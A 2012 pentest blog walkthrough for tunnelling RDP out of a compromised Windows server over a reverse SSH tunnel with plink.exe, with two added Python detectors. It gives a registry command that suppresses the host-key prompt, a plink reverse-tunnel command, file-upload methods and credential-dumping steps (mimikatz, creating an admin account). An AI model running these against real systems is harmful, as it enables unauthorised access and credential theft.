June 15, 2012
In this blog I’ll be providing instructions for establishing an RDP connection over a reverse SSH tunnel using plink.exe and FreeSSHd. I’ll also show how to do it without having to accept SSH server keys interactively, which can come in handy when pentesting. The methods outlined can also be used to tunnel other protocols over SSH connections in order to traverse firewalls, but I thought RDP was one that people could use in many scenarios. This blog should be useful to penetration testers, admins, and any home users looking for a pseudo VPN solution.
The following steps will be covered:
- Install FreeSSHd
- Install PuTTY
- Configure Tunneling Options in FreeSSHd
- Create User Accounts in FreeSSHd
- Create the Key Pair for each User with PutTTYgen
- Test the FreeSSHd Configuration with PuTTY
- Add Registry Key to Remote Server (compromised server) with Reg
- Upload Plink.exe to the Remote Server (compromised server)
- Run Plink.exe on the Remote Server (compromised server)
- Access Tunneled RDP Session on Local Port via RDP Client
Note: I realize this would be easier to understand if there were an image, but I got a little lazy. Sorry about that. Hopefully it still makes sense. If you have any questions or comments, feel free to contact me.
Install FreeSSHd
You can just as easily use some other Linux SSH server like OpenSSH (included in BackTrack, though you may have to enable it), but this blog is tuned for Windows users, so I’ll be showing how to install and configure FreeSSHd. However, make sure you have the most recent version, because the older ones have a few security issues. I’ve provided basic installation instructions for FreeSSHd below:
- Download FreeSSHd from http://www.freesshd.com.
- Install it. However, I recommend not running it as a service, so that it won’t start up automatically. Unless, of course, that’s what you’re looking for.
- Double-click the FreeSSHd icon on the desktop.
- The icon will appear on the Windows taskbar.
Configure Tunneling Options in FreeSSHd
Next, we want to make sure that our SSH server is configured to actually support tunneling, so below I’ve provided the basic instructions:
- Left-click the FreeSSHd taskbar icon to view the settings.
- Navigate to the “Authentication” tab.
- Set the “Public key folder” to the file system location where you store your public keys. This step really only applies if you’re planning to use public/private key pairs to authenticate to the server instead of a password.
- Set the “Password authentication” and “Public key authentication” options to “Allowed” by choosing the associated radio buttons.
- Press “Apply”.
- Navigate to the “Tunneling” tab.
- Ensure that the boxes next to “Allow local port forwarding” and “Allow remote port forwarding” are checked.
- Press “Apply”.
Create User Accounts in FreeSSHd
Alright, let’s create some users:
- Navigate to the “Users” tab.
- Click “Add” to create a new user.
- Enter the desired login and authentication information (password or key).
- Select all of the user options.
- Press “Apply”.
- Repeat as necessary for each user.
Create the Key Pair for Each User with PuTTYgen
Once again, this step only applies if you’re planning to use public/private key pairs to authenticate. If you’re tunneling RDP over SSH as a pseudo VPN solution, it’s a good idea to set up a password-protected key to authenticate to your SSH server. However, during a penetration test, it usually makes more sense to use a password to authenticate.
- Download the PuTTY installer from http://www.chiark.greenend.org.uk/~sgtatham/putty/download.html.
- Install PuTTY.
- Navigate to Start > All Programs > PuTTY > PuTTYgen.
- Click “Generate”, and move the mouse around to create random values for the new key pair.
- When the generation is complete, the public key will be displayed in the top text area. Copy it to notepad, make sure it is on one line, and save it to a file.
- Name the file after the user it will be used for. Then move it to the public keys directory you defined in the FreeSSHd “Authentication” tab earlier.
- I’ve found that FreeSSHd can be a little flaky at times, so I recommend completely unloading and reloading FreeSSHd to make sure that all of your settings stick. I’ve noticed that simply restarting the SSHd server via the GUI doesn’t always do the trick.
Test the FreeSSHd Server Configuration with PuTTY
Especially during a penetration test, it’s a good idea to test out your configuration on the local LAN before trying it out on a compromised system. Below I’ve provided instructions for using PuTTY to test the account and FreeSSHd configuration.
- If you are using a key to authenticate, navigate to Start > All Programs > PuTTY > Pageant. Pageant will open, and you can load your private key.
- Navigate to Start > All Programs > PuTTY > PuTTY. PuTTY will open.
- Enter the IP address of your FreeSSHd server, and press “Open”.
- You will be prompted to accept the key from the FreeSSHd server; accept it. The next time you log into the FreeSSHd server you’ll notice that you don’t have to accept it, because plink and PuTTY add a registry entry to track trusted hosts in Windows.
- If you configured your account to use a password, or a private key with a password, then you will need to provide it before gaining access to a shell.
- If you configured a private key without a password you should be provided a shell immediately after entering your username.
Add Registry Key to Remote Server (compromised server) with Reg
This step pretty much only applies to the penetration testers reading this blog. Remember a second ago when you had to accept the FreeSSHd server key before authenticating? Having that trust relationship is a requirement, and neither PuTTY nor plink has an option to suppress that check. That’s a bit of a bummer for penetration testers, because in many attack scenarios we don’t have an interactive shell to work with. Have no fear though: Antti and I have come up with a workaround.
As I mentioned in the previous steps, plink and PuTTY add a registry entry to track trusted hosts in Windows. So, we found that to suppress the “do you trust this host” prompt, we can simply add the FreeSSHd host key to the registry on the compromised server using the reg command. As a result, we can initiate a reverse SSH session without an interactive shell. Hooray!
Below are the instructions for grabbing the registry entry from your system and installing it on the compromised server:
- Navigate to Start > Run.
- Type “regedit”.
- Navigate to HKEY_CURRENT_USER\Software\SimonTatham\PuTTY\SshHostKeys.
- Right-click and export the registry entry that was created when you accepted the FreeSSHd server key.
- Add the registry entry to the compromised server using the reg command. In the example below 192.168.1.100 is the FreeSSHd server IP address and 192.168.1.5 is the compromised server IP address. (The host key data shown here is truncated.)
reg add HKEY_CURRENT_USER\Software\SimonTatham\PuTTY\SshHostKeys /v rsa2@22:192.168.1.100 /t REG_SZ /d "0x23,0xcb2b55db55f787472197e10017fd3ef10a30987cbe1049375c4c9ac63df05"
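Because the registry hack above leaves a cached host key behind, the same SshHostKeys key is a useful place for a defender or incident responder to look. The following Python is an added example, not from the original post, that parses the output of reg query HKCU\Software\SimonTatham\PuTTY\SshHostKeys (constructed here) and flags cached host keys for servers not on an approved list; the approved list, the hosts and the key data are all assumptions.

```python
import re

# Constructed sample of "reg query HKCU\Software\SimonTatham\PuTTY\SshHostKeys"
# output. Hosts and key data are made up for this example and are not real keys.
SAMPLE_REG_QUERY = r"""
HKEY_CURRENT_USER\Software\SimonTatham\PuTTY\SshHostKeys
    rsa2@22:10.0.0.7    REG_SZ    0x23,0xa1b2c3d4e5f60718293a4b5c6d7e8f90
    rsa2@22:192.168.1.100    REG_SZ    0x23,0xcb2b55db55f787472197e10017fd3ef1
    ssh-ed25519@2222:203.0.113.9    REG_SZ    0x1234abcd
"""

# Value names have the form <keytype>@<port>:<host>; the data is the key itself.
VALUE_RE = re.compile(r"^\s+(\S+)@(\d+):(\S+)\s+(REG_\w+)\s+(\S+)\s*$")


def parse_host_keys(text):
    """Return one dict per cached host key found in reg query output."""
    entries = []
    for line in text.splitlines():
        m = VALUE_RE.match(line)
        if m:
            ktype, port, host, _regtype, data = m.groups()
            entries.append({"type": ktype, "port": int(port), "host": host, "data": data})
    return entries


def rsa_modulus_bits(data):
    """Key size for PuTTY's RSA encoding '0x<exponent>,0x<modulus>'; None otherwise."""
    parts = data.split(",")
    if len(parts) != 2 or not all(p.startswith("0x") for p in parts):
        return None
    return int(parts[1], 16).bit_length()


def audit_host_keys(text, approved_hosts):
    """Flag cached host keys for SSH servers this account is not expected to use.

    A cached key means the user, or something running as the user, trusted that
    server. An entry that appeared without any interactive PuTTY session is
    worth correlating with plink.exe process-creation events. To cover every
    profile on a host, run the same query against each
    HKU\\<SID>\\Software\\SimonTatham\\PuTTY\\SshHostKeys key (assumption: the
    caller collects that output and passes it in here).
    """
    return [e for e in parse_host_keys(text) if e["host"] not in approved_hosts]
```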
OK, now that you’ve done all that, it’s time for a little full disclosure. I learned from my buddy HDESSER after I wrote this that someone already went through the trouble of writing an alternative plink client that does not prompt users to accept (cache) the host key. It’s available at http://rc.quest.com/topics/putty/readme/#plinkopt. I recommend checking it out. If you use that instead of the original version, you will not have to do the registry hack first.
Upload Plink.exe to the Remote Server (compromised server)
Now it’s time to upload plink.exe to the compromised server. Plink is a Windows SSH client that is part of the PuTTY installation package.
If you’re using key-based authentication, then you should also upload your private key at this point. The method used to upload plink.exe may depend on the vulnerability that provided initial access to the compromised server, and the existing security controls. If you already have the ability to execute arbitrary commands on the remote server (compromised server), then uploading plink.exe shouldn’t be an issue. However, for those of you looking for somewhere to start, I’ve listed some common options below.
- Web upload forms (php, asp, aspx, cfm, cgi, etc) allow you to upload arbitrary files to the compromised server quickly without an interactive shell.
- The FTP client and its “-s” script option allow you to download files to the compromised server from an FTP server easily without an interactive shell.
- MSSQL and xp_cmdshell allow you to upload files via local commands, bulk inserts, PowerShell, etc. This is a nice option when executing the attacks via a SQL injection.
- TFTP server. Hopefully I don’t have to explain this one.
- Network shares can be used to upload files after being mounted using the net commands.
- If you already have an RDP session, but are looking to send one outside of the firewall then you can upload files via the shared clipboard and local drives.
- The Meterpreter shell’s upload command does exactly what it sounds like, but of course requires an existing Meterpreter shell.
Run Plink.exe on the Remote Server (compromised server)
Almost there. Using the instructions below, start a reverse SSH tunnel that maps the remote desktop port 3389 on the compromised server to port 12345 on the FreeSSHd server. In the example below, 192.168.1.100 is the FreeSSHd server IP address (server) and 192.168.1.5 is the compromised server IP address (client).
plink.exe <SSH SERVER IP> -P 22 -C -R 127.0.0.1:12345:<CLIENT IP>:3389 -l netspi -pw letmein
plink.exe 192.168.1.100 -P 22 -C -R 127.0.0.1:12345:192.168.1.5:3389 -l test -pw password
Important Note: When traversing firewalls over the internet, make sure to use your INTERNET-facing IP address so the compromised server can actually connect back to your FreeSSHd server. Remember that some port forwarding may be required on your end. Finally, executing plink.exe with the at.exe or schtasks.exe command can be useful in some scenarios.
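Because the plink command line above ends up in process-creation logs (Windows Event ID 4688 with command-line auditing enabled, or Sysmon Event ID 1), the reverse tunnel can be spotted from the command line alone. The following Python is an added example, not from the original post, that picks plink.exe invocations out of constructed sample command lines, extracts the -R reverse-forward mapping and the SSH server, and notes a cleartext -pw; the sample lines and the list of options it understands are assumptions.

```python
import ntpath
import shlex

# Constructed process-creation command lines (as in Event ID 4688 / Sysmon Event 1).
SAMPLE_CMDLINES = [
    r'"C:\Users\Public\plink.exe" 192.168.1.100 -P 22 -C -R 127.0.0.1:12345:192.168.1.5:3389 -l test -pw password',
    r'plink.exe -ssh -batch bastion.example.net -L 8080:intranet:80 -l admin',
    r'"C:\Program Files\PuTTY\putty.exe" -load mysession',
    r'C:\Windows\System32\cmd.exe /c dir',
]

# plink options that consume the following argument (subset; assumption).
OPTS_WITH_ARG = {"-P", "-l", "-pw", "-i", "-load", "-D", "-m", "-hostkey", "-proxycmd"}

def parse_forward(spec):
    """Split a PuTTY -R/-L spec '[listen_ip:]listen_port:host:port'."""
    parts = spec.split(":")
    listen = parts[:-2]                      # ['port'] or ['ip', 'port']
    return {"listen_ip": listen[0] if len(listen) == 2 else None,
            "listen_port": int(listen[-1]), "host": parts[-2], "port": int(parts[-1])}

def analyze_cmdline(cmdline):
    """Describe a plink.exe invocation, or return None for anything else."""
    argv = shlex.split(cmdline, posix=False)   # keep Windows backslashes intact
    if ntpath.basename(argv[0].strip('"')).lower() != "plink.exe":
        return None
    f = {"server": None, "user": None, "reverse": [], "local": [], "cleartext_pw": False}
    i = 1
    while i < len(argv):
        a = argv[i]
        if a in ("-R", "-L") and i + 1 < len(argv):
            f["reverse" if a == "-R" else "local"].append(parse_forward(argv[i + 1]))
            i += 2
        elif a in OPTS_WITH_ARG and i + 1 < len(argv):
            if a == "-l":
                f["user"] = argv[i + 1]
            elif a == "-pw":
                f["cleartext_pw"] = True     # password is exposed in the audit log
            i += 2
        else:
            if not a.startswith("-") and f["server"] is None:
                f["server"] = a              # first bare argument is [user@]host
            i += 1
    return f

def reverse_tunnel_findings(cmdlines):
    """Analyses for command lines that set up a -R reverse tunnel."""
    hits = [analyze_cmdline(c) for c in cmdlines]
    return [f for f in hits if f and f["reverse"]]
```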
Access Tunneled RDP Session on Local Port via RDP Client
How does it feel? After something like 10,000 steps you’re finally at the payoff. Are you excited? Be honest. OK, OK, enough chatting, let’s finish this thing.
- If you don’t already have local credentials for the compromised system, now would be a good time to do one of the following things so you can actually log into your tunneled RDP connection:
  - Create a local administrator account with the net user command.
  - Dump unencrypted credentials with mimikatz.
  - Dump and crack the local password hashes with smart_hashdump or fgdump.
  - Dump passwords from files or the registry.
  - Etc, etc, etc…
- Log into your FreeSSHd server locally or via RDP. Navigate to Start > Run.
- Type “mstsc” on the FreeSSHd server.
- Type “127.0.0.1:12345”
- Press enter.
- Enter your credentials to login.
- Ta… wait for it… da! Now you have pretty screenshots for your reports!
It may not be the fastest option, but reverse SSH connections can be used to tunnel pretty much anything. Regardless of the protocol you’re tunneling, I recommend using the registry hack or modified plink executable during penetration tests to make life a little easier.
Finally, for those who are interested, I’ve listed a couple of links in the references section to blogs that provide instructions for using plink with Metasploit. Have fun and hack responsibly.